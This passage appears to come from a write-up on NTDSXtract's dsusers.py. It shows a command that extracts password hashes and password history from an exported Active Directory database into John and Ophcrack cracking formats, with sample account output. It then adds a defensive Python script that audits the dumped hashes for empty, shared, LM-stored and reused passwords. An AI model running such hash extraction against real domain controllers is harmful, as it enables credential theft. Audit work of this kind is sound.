python dsusers.py ~/ntds.export/datatable.3  ~/ntds.export/link_table.4 ~/TEMP  --passwordhashes --passwordhistory --lmoutfile LM.out --ntoutfile NT.out --pwdformat john --syshive ~/SYSTEM

List of users:
==============
Record ID:           32777
User name:           joe smith
User principal name: email@address.net
SAM Account name:    jsmith
SAM Account type:    SAM_NORMAL_USER_ACCOUNT
GUID: 14c15e2a-8f7c-4404-a63c-cb6a4c689c00
SID:  S-1-5-21-349701255-3731294407-2303513147-3800
When created:         2005-06-01 13:50:37
When changed:         2013-12-12 15:08:12
Account expires:      Never
Password last set:    2013-10-07 13:20:19.146593
Last logon:           2013-12-11 18:35:10.166785
Last logon timestamp: 2013-12-12 15:08:12.281517
Bad password time     2013-12-11 00:04:52.446209
Logon count:          6239
Bad password count:   0
User Account Control:
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$ local DOMAIN JOB Users joe smith
Password hashes:
name:$NT$2e8fc4b95229a6ea67b1f69d04ee4000:::
name:e4c2436ddd1f655c6eedd0fa5525f000:::
….(Continues for each Account)….
Version 1.2 allows you to extract the hashes into two files, one for LM hashes the other for NT hashes, and currently supports two hash output types; Ophcrack and John.
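The LM.out / NT.out files written in John format (shown above and in the "Updated Version" post earlier on the page) are also exactly what an internal password-hygiene audit needs, without cracking anything: a non-empty LM hash means the password is stored in the old, cheap-to-crack format; the well-known empty-password NT hash means an account with no password; several accounts sharing one NT hash means password reuse; and a current hash that also appears in the `_nthistoryN` entries means a user cycled back to an old password. The following Python is an added example, not code from the post or from NTDSXtract; the sample lines are constructed in the same `user:$NT$hash:::` / `user:lmhash:::` layout as the output above, with made-up digests, and the finding names are my own. The two empty-password constants are the standard NT and LM hashes of the empty string.

```python
import re
from collections import defaultdict

# Hashes of the empty password (well-known constants, not taken from the write-up)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"

# One line of the john-format output: account, optional $NT$ tag, 32 hex digits, ":::"
LINE_RE = re.compile(r"^(?P<account>[^:]+):(?P<tag>\$NT\$)?(?P<digest>[0-9a-fA-F]{32}):::\s*$")
# History entries are written as <user>_nthistory<N> / <user>_lmhistory<N>
HIST_RE = re.compile(r"^(?P<user>.+)_(?P<kind>nt|lm)history(?P<idx>\d+)$")

# Constructed sample in the same layout as NT.out and LM.out (digests are made up)
SAMPLE_NT = """\
alice:$NT$11111111111111111111111111111111:::
bob:$NT$11111111111111111111111111111111:::
svc_backup:$NT$31d6cfe0d16ae931b73c59d7e0c089c0:::
carol:$NT$22222222222222222222222222222222:::
carol_nthistory0:$NT$22222222222222222222222222222222:::
carol_nthistory1:$NT$33333333333333333333333333333333:::
carol_nthistory2:$NT$22222222222222222222222222222222:::
Record ID: 32777
"""
SAMPLE_LM = """\
alice:aad3b435b51404eeaad3b435b51404ee:::
bob:44444444444444444444444444444444:::
carol_lmhistory0:55555555555555555555555555555555:::
"""


def parse_line(line):
    """Return {'user', 'kind', 'history', 'digest'} for a hash line, or None for anything else."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = {"user": m.group("account"), "kind": "nt" if m.group("tag") else "lm",
           "history": None, "digest": m.group("digest").lower()}
    h = HIST_RE.match(rec["user"])
    if h:  # a password-history entry: strip the suffix, keep the index
        rec.update(user=h.group("user"), kind=h.group("kind"), history=int(h.group("idx")))
    return rec


def audit(lines):
    """Flag weak password hygiene visible in the exported hash files."""
    findings = {"empty_password": [], "lm_hash_stored": [],
                "shared_nt_hash": {}, "old_password_reused": []}
    current_nt, by_nt, previous_nt = {}, defaultdict(list), defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # headers, record dumps and blank lines are skipped
        if rec["kind"] == "lm":
            # a real LM hash means the password is stored in the weak pre-NT format
            if rec["history"] is None and rec["digest"] != EMPTY_LM:
                findings["lm_hash_stored"].append(rec["user"])
        elif rec["history"] is None:
            current_nt[rec["user"]] = rec["digest"]
            by_nt[rec["digest"]].append(rec["user"])
            if rec["digest"] == EMPTY_NT:
                findings["empty_password"].append(rec["user"])
        elif rec["history"] > 0:
            # in the output above nthistory0 equals the current hash, so only entries 1+ are old passwords
            previous_nt[rec["user"]].add(rec["digest"])
    findings["shared_nt_hash"] = {d: sorted(users) for d, users in by_nt.items() if len(users) > 1}
    findings["old_password_reused"] = sorted(u for u, d in current_nt.items() if d in previous_nt[u])
    return findings


if __name__ == "__main__":
    for name, hit in audit(SAMPLE_NT.splitlines() + SAMPLE_LM.splitlines()).items():
        print(f"{name}: {hit}")
```

On real output, pass the lines of NT.out and LM.out together (the parser tells them apart by the `$NT$` tag and the history suffix). The shared-hash finding is the one worth acting on first: it surfaces service accounts and admins set to the same password without revealing what the password is.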